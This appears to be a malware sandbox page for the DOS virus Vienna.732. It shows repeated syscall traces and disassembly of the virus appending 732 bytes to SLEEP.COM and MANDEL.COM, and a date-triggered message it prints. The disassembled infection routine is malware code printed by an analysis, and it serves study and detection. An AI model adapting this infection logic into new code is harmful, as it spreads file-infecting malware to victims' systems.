Sample viewer

vx.netlux.org/Virus.DOS.Vienna.732

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:35.834743685Z 255 PC: 12d48 | UNKNOWN!
2018-12-17T22:53:35.835917932Z 47 PC: 12d55 | Get disk transfer address
2018-12-17T22:53:35.837657379Z 26 PC: 12d62 | Set disk transfer address
2018-12-17T22:53:35.839387911Z 78 PC: 12e10 | Find first file
2018-12-17T22:53:35.846314669Z 67 PC: 12e4f | Get or set file attributes
2018-12-17T22:53:35.853701438Z 67 PC: 12e61 | Get or set file attributes
2018-12-17T22:53:35.871110186Z 61 PC: 12e6c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:35.878474152Z 87 PC: 12e78 | Get or set file date and time
2018-12-17T22:53:35.881117345Z 44 PC: 12e84 | Get time 0x12e84: mov ah, 0x3f
0x12e86: mov cx, 3
0x12e89: mov dx, 0x48
0x12e8c: nop
0x12e8d: add dx, si
0x12e8f: int 0x21
0x12e91: jb 0x12ee9
0x12e93: cmp ax, 3
0x12e96: jne 0x12ee9
0x12e98: mov ax, 0x4202
0x12e9b: mov cx, 0
0x12e9e: mov dx, 0
0x12ea1: int 0x21
0x12ea3: jb 0x12ee9
0x12ea5: mov cx, ax
0x12ea7: sub ax, 3
0x12eaa: mov word ptr [si + 0x4c], ax
0x12ead: nop
0x12eae: add cx, 0x314
0x12eb2: mov di, si
2018-12-17T22:53:35.883805702Z 63 PC: 12e91 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:35.890798614Z 66 PC: 12ea3 | Move file pointer
2018-12-17T22:53:35.892405165Z 64 PC: 12ec8 | Write file or device (Write 732 bytes on handle 5)
2018-12-17T22:53:35.902676706Z 66 PC: 12eda | Move file pointer
2018-12-17T22:53:35.904276152Z 64 PC: 12ee9 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:35.91177486Z 87 PC: 12efc | Get or set file date and time
2018-12-17T22:53:35.91452113Z 62 PC: 12f00 | Close file
2018-12-17T22:53:35.923489111Z 67 PC: 12f0f | Get or set file attributes
2018-12-17T22:53:35.934948408Z 26 PC: 12f1c | Set disk transfer address
2018-12-17T22:53:35.936763743Z 42 PC: 12f21 | Get date 0x12f21: cmp dl, 0x15
0x12f24: jne 0x12f30
0x12f26: mov ah, 9
0x12f28: mov dx, si
0x12f2a: add dx, 0x15
0x12f2d: nop
0x12f2e: int 0x21
0x12f30: pop cx
0x12f31: xor ax, ax
0x12f33: xor bx, bx
0x12f35: xor dx, dx
0x12f37: xor si, si
0x12f39: mov di, 0x100
0x12f3c: push di
0x12f3d: xor di, di
0x12f3f: ret 0xffff
0x12f42: add cl, byte ptr [di]
0x12f44: or dl, byte ptr [bp + di + 0x4b]
0x12f47: dec cx
0x12f48: push bx
2018-12-17T22:53:35.93963857Z 255 PC: 12a6c | UNKNOWN!
2018-12-17T22:53:35.94092527Z 47 PC: 12a79 | Get disk transfer address
2018-12-17T22:53:35.942992555Z 26 PC: 12a86 | Set disk transfer address
2018-12-17T22:53:35.944414845Z 78 PC: 12b34 | Find first file
2018-12-17T22:53:35.951343705Z 79 PC: 12b3a | Find next file
2018-12-17T22:53:35.957584097Z 79 PC: 12b3a | Find next file
2018-12-17T22:53:35.960900078Z 79 PC: 12b3a | Find next file
2018-12-17T22:53:35.964331066Z 79 PC: 12b3a | Find next file
2018-12-17T22:53:35.969110612Z 79 PC: 12b3a | Find next file
2018-12-17T22:53:35.972407468Z 67 PC: 12b73 | Get or set file attributes
2018-12-17T22:53:35.97875424Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T22:53:35.98973556Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:53:35.99801909Z 87 PC: 12b9c | Get or set file date and time
2018-12-17T22:53:35.999872224Z 44 PC: 12ba8 | Get time 0x12ba8: mov ah, 0x3f
0x12baa: mov cx, 3
0x12bad: mov dx, 0x48
0x12bb0: nop
0x12bb1: add dx, si
0x12bb3: int 0x21
0x12bb5: jb 0x12c0d
0x12bb7: cmp ax, 3
0x12bba: jne 0x12c0d
0x12bbc: mov ax, 0x4202
0x12bbf: mov cx, 0
0x12bc2: mov dx, 0
0x12bc5: int 0x21
0x12bc7: jb 0x12c0d
0x12bc9: mov cx, ax
0x12bcb: sub ax, 3
0x12bce: mov word ptr [si + 0x4c], ax
0x12bd1: nop
0x12bd2: add cx, 0x314
0x12bd6: mov di, si
2018-12-17T22:53:36.002356367Z 63 PC: 12bb5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:36.010050301Z 66 PC: 12bc7 | Move file pointer
2018-12-17T22:53:36.011754985Z 64 PC: 12bec | Write file or device (Write 732 bytes on handle 5)
2018-12-17T22:53:36.021338535Z 66 PC: 12bfe | Move file pointer
2018-12-17T22:53:36.02332196Z 64 PC: 12c0d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:36.030551617Z 87 PC: 12c20 | Get or set file date and time
2018-12-17T22:53:36.032177106Z 62 PC: 12c24 | Close file
2018-12-17T22:53:36.042199382Z 67 PC: 12c33 | Get or set file attributes
2018-12-17T22:53:36.05288756Z 26 PC: 12c40 | Set disk transfer address
2018-12-17T22:53:36.054228896Z 42 PC: 12c45 | Get date 0x12c45: cmp dl, 0x15
0x12c48: jne 0x12c54
0x12c4a: mov ah, 9
0x12c4c: mov dx, si
0x12c4e: add dx, 0x15
0x12c51: nop
0x12c52: int 0x21
0x12c54: pop cx
0x12c55: xor ax, ax
0x12c57: xor bx, bx
0x12c59: xor dx, dx
0x12c5b: xor si, si
0x12c5d: mov di, 0x100
0x12c60: push di
0x12c61: xor di, di
0x12c63: ret 0xffff
0x12c66: add cl, byte ptr [di]
0x12c68: or dl, byte ptr [bp + di + 0x4b]
0x12c6b: dec cx
0x12c6c: push bx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11279,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.920949475Z 255 PC: 12d48 | UNKNOWN!
2018-12-25T12:30:16.922115839Z 47 PC: 12d55 | Get disk transfer address
2018-12-25T12:30:16.923180234Z 26 PC: 12d62 | Set disk transfer address
2018-12-25T12:30:16.924420024Z 78 PC: 12e10 | Find first file
2018-12-25T12:30:16.934416308Z 67 PC: 12e4f | Get or set file attributes
2018-12-25T12:30:16.940218502Z 67 PC: 12e61 | Get or set file attributes
2018-12-25T12:30:16.955828338Z 61 PC: 12e6c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.963153245Z 87 PC: 12e78 | Get or set file date and time
2018-12-25T12:30:16.964891786Z 44 PC: 12e84 | Get time 0x12e84: mov ah, 0x3f
0x12e86: mov cx, 3
0x12e89: mov dx, 0x48
0x12e8c: nop
0x12e8d: add dx, si
0x12e8f: int 0x21
0x12e91: jb 0x12ee9
0x12e93: cmp ax, 3
0x12e96: jne 0x12ee9
0x12e98: mov ax, 0x4202
0x12e9b: mov cx, 0
0x12e9e: mov dx, 0
0x12ea1: int 0x21
0x12ea3: jb 0x12ee9
0x12ea5: mov cx, ax
0x12ea7: sub ax, 3
0x12eaa: mov word ptr [si + 0x4c], ax
0x12ead: nop
0x12eae: add cx, 0x314
0x12eb2: mov di, si
2018-12-25T12:30:16.967333822Z 63 PC: 12e91 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.974875048Z 66 PC: 12ea3 | Move file pointer
2018-12-25T12:30:16.977884838Z 64 PC: 12ec8 | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:16.987146513Z 66 PC: 12eda | Move file pointer
2018-12-25T12:30:16.989545027Z 64 PC: 12ee9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.997413053Z 87 PC: 12efc | Get or set file date and time
2018-12-25T12:30:16.998974902Z 62 PC: 12f00 | Close file
2018-12-25T12:30:17.007301504Z 67 PC: 12f0f | Get or set file attributes
2018-12-25T12:30:17.018249093Z 26 PC: 12f1c | Set disk transfer address
2018-12-25T12:30:17.01931687Z 42 PC: 12f21 | Get date 0x12f21: cmp dl, 0x15
0x12f24: jne 0x12f30
0x12f26: mov ah, 9
0x12f28: mov dx, si
0x12f2a: add dx, 0x15
0x12f2d: nop
0x12f2e: int 0x21
0x12f30: pop cx
0x12f31: xor ax, ax
0x12f33: xor bx, bx
0x12f35: xor dx, dx
0x12f37: xor si, si
0x12f39: mov di, 0x100
0x12f3c: push di
0x12f3d: xor di, di
0x12f3f: ret 0xffff
0x12f42: add cl, byte ptr [di]
0x12f44: or dl, byte ptr [bp + di + 0x4b]
0x12f47: dec cx
0x12f48: push bx
2018-12-25T12:30:17.021370899Z 255 PC: 12a6c | UNKNOWN!
2018-12-25T12:30:17.029284029Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:30:17.030447956Z 26 PC: 12a86 | Set disk transfer address
2018-12-25T12:30:17.032046529Z 78 PC: 12b34 | Find first file
2018-12-25T12:30:17.039697629Z 79 PC: 12b3a | Find next file
2018-12-25T12:30:17.043211006Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:17.046972959Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:17.050264301Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:17.055102319Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:17.057651981Z 67 PC: 12b73 | Get or set file attributes
2018-12-25T12:30:17.064154219Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:30:17.075284445Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:30:17.08166973Z 87 PC: 12b9c | Get or set file date and time
2018-12-25T12:30:17.08290848Z 44 PC: 12ba8 | Get time 0x12ba8: mov ah, 0x3f
0x12baa: mov cx, 3
0x12bad: mov dx, 0x48
0x12bb0: nop
0x12bb1: add dx, si
0x12bb3: int 0x21
0x12bb5: jb 0x12c0d
0x12bb7: cmp ax, 3
0x12bba: jne 0x12c0d
0x12bbc: mov ax, 0x4202
0x12bbf: mov cx, 0
0x12bc2: mov dx, 0
0x12bc5: int 0x21
0x12bc7: jb 0x12c0d
0x12bc9: mov cx, ax
0x12bcb: sub ax, 3
0x12bce: mov word ptr [si + 0x4c], ax
0x12bd1: nop
0x12bd2: add cx, 0x314
0x12bd6: mov di, si
2018-12-25T12:30:17.093457733Z 63 PC: 12bb5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:17.099806357Z 66 PC: 12bc7 | Move file pointer
2018-12-25T12:30:17.101235932Z 64 PC: 12bec | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:17.11100232Z 66 PC: 12bfe | Move file pointer
2018-12-25T12:30:17.112392686Z 64 PC: 12c0d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:17.119015765Z 87 PC: 12c20 | Get or set file date and time
2018-12-25T12:30:17.121613019Z 62 PC: 12c24 | Close file
2018-12-25T12:30:17.129436497Z 67 PC: 12c33 | Get or set file attributes
2018-12-25T12:30:17.139589593Z 26 PC: 12c40 | Set disk transfer address
2018-12-25T12:30:17.141562759Z 42 PC: 12c45 | Get date 0x12c45: cmp dl, 0x15
0x12c48: jne 0x12c54
0x12c4a: mov ah, 9
0x12c4c: mov dx, si
0x12c4e: add dx, 0x15
0x12c51: nop
0x12c52: int 0x21
0x12c54: pop cx
0x12c55: xor ax, ax
0x12c57: xor bx, bx
0x12c59: xor dx, dx
0x12c5b: xor si, si
0x12c5d: mov di, 0x100
0x12c60: push di
0x12c61: xor di, di
0x12c63: ret 0xffff
0x12c66: add cl, byte ptr [di]
0x12c68: or dl, byte ptr [bp + di + 0x4b]
0x12c6b: dec cx
0x12c6c: push bx

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11279,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:17.239060143Z 255 PC: 12d48 | UNKNOWN!
2018-12-25T12:30:17.24050699Z 47 PC: 12d55 | Get disk transfer address
2018-12-25T12:30:17.242394087Z 26 PC: 12d62 | Set disk transfer address
2018-12-25T12:30:17.243584235Z 78 PC: 12e10 | Find first file
2018-12-25T12:30:17.249684045Z 67 PC: 12e4f | Get or set file attributes
2018-12-25T12:30:17.256039264Z 67 PC: 12e61 | Get or set file attributes
2018-12-25T12:30:17.918492319Z 61 PC: 12e6c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:17.930604523Z 87 PC: 12e78 | Get or set file date and time
2018-12-25T12:30:17.933262231Z 44 PC: 12e84 | Get time 0x12e84: mov ah, 0x3f
0x12e86: mov cx, 3
0x12e89: mov dx, 0x48
0x12e8c: nop
0x12e8d: add dx, si
0x12e8f: int 0x21
0x12e91: jb 0x12ee9
0x12e93: cmp ax, 3
0x12e96: jne 0x12ee9
0x12e98: mov ax, 0x4202
0x12e9b: mov cx, 0
0x12e9e: mov dx, 0
0x12ea1: int 0x21
0x12ea3: jb 0x12ee9
0x12ea5: mov cx, ax
0x12ea7: sub ax, 3
0x12eaa: mov word ptr [si + 0x4c], ax
0x12ead: nop
0x12eae: add cx, 0x314
0x12eb2: mov di, si
2018-12-25T12:30:17.935796989Z 63 PC: 12e91 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:17.942547893Z 66 PC: 12ea3 | Move file pointer
2018-12-25T12:30:17.945410723Z 64 PC: 12ec8 | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:17.954021013Z 66 PC: 12eda | Move file pointer
2018-12-25T12:30:17.95570866Z 64 PC: 12ee9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:17.962872769Z 87 PC: 12efc | Get or set file date and time
2018-12-25T12:30:17.96430951Z 62 PC: 12f00 | Close file
2018-12-25T12:30:17.972060059Z 67 PC: 12f0f | Get or set file attributes
2018-12-25T12:30:17.983080328Z 26 PC: 12f1c | Set disk transfer address
2018-12-25T12:30:17.997484907Z 42 PC: 12f21 | Get date 0x12f21: cmp dl, 0x15
0x12f24: jne 0x12f30
0x12f26: mov ah, 9
0x12f28: mov dx, si
0x12f2a: add dx, 0x15
0x12f2d: nop
0x12f2e: int 0x21
0x12f30: pop cx
0x12f31: xor ax, ax
0x12f33: xor bx, bx
0x12f35: xor dx, dx
0x12f37: xor si, si
0x12f39: mov di, 0x100
0x12f3c: push di
0x12f3d: xor di, di
0x12f3f: ret 0xffff
0x12f42: add cl, byte ptr [di]
0x12f44: or dl, byte ptr [bp + di + 0x4b]
0x12f47: dec cx
0x12f48: push bx
2018-12-25T12:30:17.99955847Z 9 PC: 12f30 | Display string (String= ' FiRe is a LAMER... destroy InFiniTy! ')
2018-12-25T12:30:18.010629266Z 255 PC: 12a6c | UNKNOWN!
2018-12-25T12:30:18.012078817Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:30:18.015847918Z 26 PC: 12a86 | Set disk transfer address
2018-12-25T12:30:18.017912277Z 78 PC: 12b34 | Find first file
2018-12-25T12:30:18.025211991Z 79 PC: 12b3a | Find next file
2018-12-25T12:30:18.02809717Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.030931806Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.034907412Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.037690422Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.040529627Z 67 PC: 12b73 | Get or set file attributes
2018-12-25T12:30:18.049495076Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:30:18.064799986Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:30:18.083585312Z 87 PC: 12b9c | Get or set file date and time
2018-12-25T12:30:18.086145182Z 44 PC: 12ba8 | Get time 0x12ba8: mov ah, 0x3f
0x12baa: mov cx, 3
0x12bad: mov dx, 0x48
0x12bb0: nop
0x12bb1: add dx, si
0x12bb3: int 0x21
0x12bb5: jb 0x12c0d
0x12bb7: cmp ax, 3
0x12bba: jne 0x12c0d
0x12bbc: mov ax, 0x4202
0x12bbf: mov cx, 0
0x12bc2: mov dx, 0
0x12bc5: int 0x21
0x12bc7: jb 0x12c0d
0x12bc9: mov cx, ax
0x12bcb: sub ax, 3
0x12bce: mov word ptr [si + 0x4c], ax
0x12bd1: nop
0x12bd2: add cx, 0x314
0x12bd6: mov di, si
2018-12-25T12:30:18.088138797Z 63 PC: 12bb5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:18.094964271Z 66 PC: 12bc7 | Move file pointer
2018-12-25T12:30:18.097127595Z 64 PC: 12bec | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:18.139281846Z 66 PC: 12bfe | Move file pointer
2018-12-25T12:30:18.141694745Z 64 PC: 12c0d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:18.149296183Z 87 PC: 12c20 | Get or set file date and time
2018-12-25T12:30:18.151478229Z 62 PC: 12c24 | Close file
2018-12-25T12:30:18.416500046Z 67 PC: 12c33 | Get or set file attributes
2018-12-25T12:30:18.452715749Z 26 PC: 12c40 | Set disk transfer address
2018-12-25T12:30:18.454613062Z 42 PC: 12c45 | Get date 0x12c45: cmp dl, 0x15
0x12c48: jne 0x12c54
0x12c4a: mov ah, 9
0x12c4c: mov dx, si
0x12c4e: add dx, 0x15
0x12c51: nop
0x12c52: int 0x21
0x12c54: pop cx
0x12c55: xor ax, ax
0x12c57: xor bx, bx
0x12c59: xor dx, dx
0x12c5b: xor si, si
0x12c5d: mov di, 0x100
0x12c60: push di
0x12c61: xor di, di
0x12c63: ret 0xffff
0x12c66: add cl, byte ptr [di]
0x12c68: or dl, byte ptr [bp + di + 0x4b]
0x12c6b: dec cx
0x12c6c: push bx
2018-12-25T12:30:18.457011699Z 9 PC: 12c54 | Display string (String= ' FiRe is a LAMER... destroy InFiniTy! ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11279,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:17.371085362Z 255 PC: 12d48 | UNKNOWN!
2018-12-25T12:30:17.372839138Z 47 PC: 12d55 | Get disk transfer address
2018-12-25T12:30:17.373875609Z 26 PC: 12d62 | Set disk transfer address
2018-12-25T12:30:17.374938437Z 78 PC: 12e10 | Find first file
2018-12-25T12:30:17.381525471Z 67 PC: 12e4f | Get or set file attributes
2018-12-25T12:30:17.387624531Z 67 PC: 12e61 | Get or set file attributes
2018-12-25T12:30:17.926520471Z 61 PC: 12e6c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:17.933548498Z 87 PC: 12e78 | Get or set file date and time
2018-12-25T12:30:17.935596094Z 44 PC: 12e84 | Get time 0x12e84: mov ah, 0x3f
0x12e86: mov cx, 3
0x12e89: mov dx, 0x48
0x12e8c: nop
0x12e8d: add dx, si
0x12e8f: int 0x21
0x12e91: jb 0x12ee9
0x12e93: cmp ax, 3
0x12e96: jne 0x12ee9
0x12e98: mov ax, 0x4202
0x12e9b: mov cx, 0
0x12e9e: mov dx, 0
0x12ea1: int 0x21
0x12ea3: jb 0x12ee9
0x12ea5: mov cx, ax
0x12ea7: sub ax, 3
0x12eaa: mov word ptr [si + 0x4c], ax
0x12ead: nop
0x12eae: add cx, 0x314
0x12eb2: mov di, si
2018-12-25T12:30:17.937971306Z 63 PC: 12e91 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:17.945129308Z 66 PC: 12ea3 | Move file pointer
2018-12-25T12:30:17.94729392Z 64 PC: 12ec8 | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:17.953682061Z 66 PC: 12eda | Move file pointer
2018-12-25T12:30:17.954825581Z 64 PC: 12ee9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:17.959751248Z 87 PC: 12efc | Get or set file date and time
2018-12-25T12:30:17.960865996Z 62 PC: 12f00 | Close file
2018-12-25T12:30:17.966712453Z 67 PC: 12f0f | Get or set file attributes
2018-12-25T12:30:17.973757035Z 26 PC: 12f1c | Set disk transfer address
2018-12-25T12:30:17.974647741Z 42 PC: 12f21 | Get date 0x12f21: cmp dl, 0x15
0x12f24: jne 0x12f30
0x12f26: mov ah, 9
0x12f28: mov dx, si
0x12f2a: add dx, 0x15
0x12f2d: nop
0x12f2e: int 0x21
0x12f30: pop cx
0x12f31: xor ax, ax
0x12f33: xor bx, bx
0x12f35: xor dx, dx
0x12f37: xor si, si
0x12f39: mov di, 0x100
0x12f3c: push di
0x12f3d: xor di, di
0x12f3f: ret 0xffff
0x12f42: add cl, byte ptr [di]
0x12f44: or dl, byte ptr [bp + di + 0x4b]
0x12f47: dec cx
0x12f48: push bx
2018-12-25T12:30:17.976139488Z 255 PC: 12a6c | UNKNOWN!
2018-12-25T12:30:17.977488723Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:30:17.9787518Z 26 PC: 12a86 | Set disk transfer address
2018-12-25T12:30:17.979907122Z 78 PC: 12b34 | Find first file
2018-12-25T12:30:18.000487919Z 79 PC: 12b3a | Find next file
2018-12-25T12:30:18.004591985Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.008079652Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.012553462Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.015850691Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.019012419Z 67 PC: 12b73 | Get or set file attributes
2018-12-25T12:30:18.026239826Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:30:18.037797621Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:30:18.0448196Z 87 PC: 12b9c | Get or set file date and time
2018-12-25T12:30:18.049127185Z 44 PC: 12ba8 | Get time 0x12ba8: mov ah, 0x3f
0x12baa: mov cx, 3
0x12bad: mov dx, 0x48
0x12bb0: nop
0x12bb1: add dx, si
0x12bb3: int 0x21
0x12bb5: jb 0x12c0d
0x12bb7: cmp ax, 3
0x12bba: jne 0x12c0d
0x12bbc: mov ax, 0x4202
0x12bbf: mov cx, 0
0x12bc2: mov dx, 0
0x12bc5: int 0x21
0x12bc7: jb 0x12c0d
0x12bc9: mov cx, ax
0x12bcb: sub ax, 3
0x12bce: mov word ptr [si + 0x4c], ax
0x12bd1: nop
0x12bd2: add cx, 0x314
0x12bd6: mov di, si
2018-12-25T12:30:18.051632118Z 63 PC: 12bb5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:18.058403514Z 66 PC: 12bc7 | Move file pointer
2018-12-25T12:30:18.060264527Z 64 PC: 12bec | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:18.069566122Z 66 PC: 12bfe | Move file pointer
2018-12-25T12:30:18.07127984Z 64 PC: 12c0d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:18.0768864Z 87 PC: 12c20 | Get or set file date and time
2018-12-25T12:30:18.079040785Z 62 PC: 12c24 | Close file
2018-12-25T12:30:18.087279199Z 67 PC: 12c33 | Get or set file attributes
2018-12-25T12:30:18.097250209Z 26 PC: 12c40 | Set disk transfer address
2018-12-25T12:30:18.099747253Z 42 PC: 12c45 | Get date 0x12c45: cmp dl, 0x15
0x12c48: jne 0x12c54
0x12c4a: mov ah, 9
0x12c4c: mov dx, si
0x12c4e: add dx, 0x15
0x12c51: nop
0x12c52: int 0x21
0x12c54: pop cx
0x12c55: xor ax, ax
0x12c57: xor bx, bx
0x12c59: xor dx, dx
0x12c5b: xor si, si
0x12c5d: mov di, 0x100
0x12c60: push di
0x12c61: xor di, di
0x12c63: ret 0xffff
0x12c66: add cl, byte ptr [di]
0x12c68: or dl, byte ptr [bp + di + 0x4b]
0x12c6b: dec cx
0x12c6c: push bx

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11279,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:17.461624663Z 255 PC: 12d48 | UNKNOWN!
2018-12-25T12:30:17.463663963Z 47 PC: 12d55 | Get disk transfer address
2018-12-25T12:30:17.464775233Z 26 PC: 12d62 | Set disk transfer address
2018-12-25T12:30:17.466036451Z 78 PC: 12e10 | Find first file
2018-12-25T12:30:17.472621507Z 67 PC: 12e4f | Get or set file attributes
2018-12-25T12:30:17.478157356Z 67 PC: 12e61 | Get or set file attributes
2018-12-25T12:30:17.9167875Z 61 PC: 12e6c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:17.935201803Z 87 PC: 12e78 | Get or set file date and time
2018-12-25T12:30:17.937343276Z 44 PC: 12e84 | Get time 0x12e84: mov ah, 0x3f
0x12e86: mov cx, 3
0x12e89: mov dx, 0x48
0x12e8c: nop
0x12e8d: add dx, si
0x12e8f: int 0x21
0x12e91: jb 0x12ee9
0x12e93: cmp ax, 3
0x12e96: jne 0x12ee9
0x12e98: mov ax, 0x4202
0x12e9b: mov cx, 0
0x12e9e: mov dx, 0
0x12ea1: int 0x21
0x12ea3: jb 0x12ee9
0x12ea5: mov cx, ax
0x12ea7: sub ax, 3
0x12eaa: mov word ptr [si + 0x4c], ax
0x12ead: nop
0x12eae: add cx, 0x314
0x12eb2: mov di, si
2018-12-25T12:30:17.939611056Z 63 PC: 12e91 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:17.947692663Z 66 PC: 12ea3 | Move file pointer
2018-12-25T12:30:17.949513058Z 64 PC: 12ec8 | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:17.958759413Z 66 PC: 12eda | Move file pointer
2018-12-25T12:30:17.96053588Z 64 PC: 12ee9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:17.967810891Z 87 PC: 12efc | Get or set file date and time
2018-12-25T12:30:17.969668029Z 62 PC: 12f00 | Close file
2018-12-25T12:30:17.97781053Z 67 PC: 12f0f | Get or set file attributes
2018-12-25T12:30:17.98864483Z 26 PC: 12f1c | Set disk transfer address
2018-12-25T12:30:17.990683853Z 42 PC: 12f21 | Get date 0x12f21: cmp dl, 0x15
0x12f24: jne 0x12f30
0x12f26: mov ah, 9
0x12f28: mov dx, si
0x12f2a: add dx, 0x15
0x12f2d: nop
0x12f2e: int 0x21
0x12f30: pop cx
0x12f31: xor ax, ax
0x12f33: xor bx, bx
0x12f35: xor dx, dx
0x12f37: xor si, si
0x12f39: mov di, 0x100
0x12f3c: push di
0x12f3d: xor di, di
0x12f3f: ret 0xffff
0x12f42: add cl, byte ptr [di]
0x12f44: or dl, byte ptr [bp + di + 0x4b]
0x12f47: dec cx
0x12f48: push bx
2018-12-25T12:30:17.993035481Z 9 PC: 12f30 | Display string (String= ' FiRe is a LAMER... destroy InFiniTy! ')
2018-12-25T12:30:18.000835201Z 255 PC: 12a6c | UNKNOWN!
2018-12-25T12:30:18.01295896Z 47 PC: 12a79 | Get disk transfer address
2018-12-25T12:30:18.01410256Z 26 PC: 12a86 | Set disk transfer address
2018-12-25T12:30:18.015684518Z 78 PC: 12b34 | Find first file
2018-12-25T12:30:18.02329855Z 79 PC: 12b3a | Find next file
2018-12-25T12:30:18.026211977Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.029664032Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.032953264Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.036167428Z 79 PC: 12b3a | Find next file (See above)
2018-12-25T12:30:18.039292957Z 67 PC: 12b73 | Get or set file attributes
2018-12-25T12:30:18.045966584Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:30:18.06145471Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:30:18.07102359Z 87 PC: 12b9c | Get or set file date and time
2018-12-25T12:30:18.097073466Z 44 PC: 12ba8 | Get time 0x12ba8: mov ah, 0x3f
0x12baa: mov cx, 3
0x12bad: mov dx, 0x48
0x12bb0: nop
0x12bb1: add dx, si
0x12bb3: int 0x21
0x12bb5: jb 0x12c0d
0x12bb7: cmp ax, 3
0x12bba: jne 0x12c0d
0x12bbc: mov ax, 0x4202
0x12bbf: mov cx, 0
0x12bc2: mov dx, 0
0x12bc5: int 0x21
0x12bc7: jb 0x12c0d
0x12bc9: mov cx, ax
0x12bcb: sub ax, 3
0x12bce: mov word ptr [si + 0x4c], ax
0x12bd1: nop
0x12bd2: add cx, 0x314
0x12bd6: mov di, si
2018-12-25T12:30:18.099456135Z 63 PC: 12bb5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:18.104977355Z 66 PC: 12bc7 | Move file pointer
2018-12-25T12:30:18.106877725Z 64 PC: 12bec | Write file or device (Write 732 bytes on handle 5)
2018-12-25T12:30:18.116142519Z 66 PC: 12bfe | Move file pointer
2018-12-25T12:30:18.118133207Z 64 PC: 12c0d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:18.125593882Z 87 PC: 12c20 | Get or set file date and time
2018-12-25T12:30:18.127630727Z 62 PC: 12c24 | Close file
2018-12-25T12:30:18.24769754Z 67 PC: 12c33 | Get or set file attributes
2018-12-25T12:30:18.452399798Z 26 PC: 12c40 | Set disk transfer address
2018-12-25T12:30:18.453886764Z 42 PC: 12c45 | Get date 0x12c45: cmp dl, 0x15
0x12c48: jne 0x12c54
0x12c4a: mov ah, 9
0x12c4c: mov dx, si
0x12c4e: add dx, 0x15
0x12c51: nop
0x12c52: int 0x21
0x12c54: pop cx
0x12c55: xor ax, ax
0x12c57: xor bx, bx
0x12c59: xor dx, dx
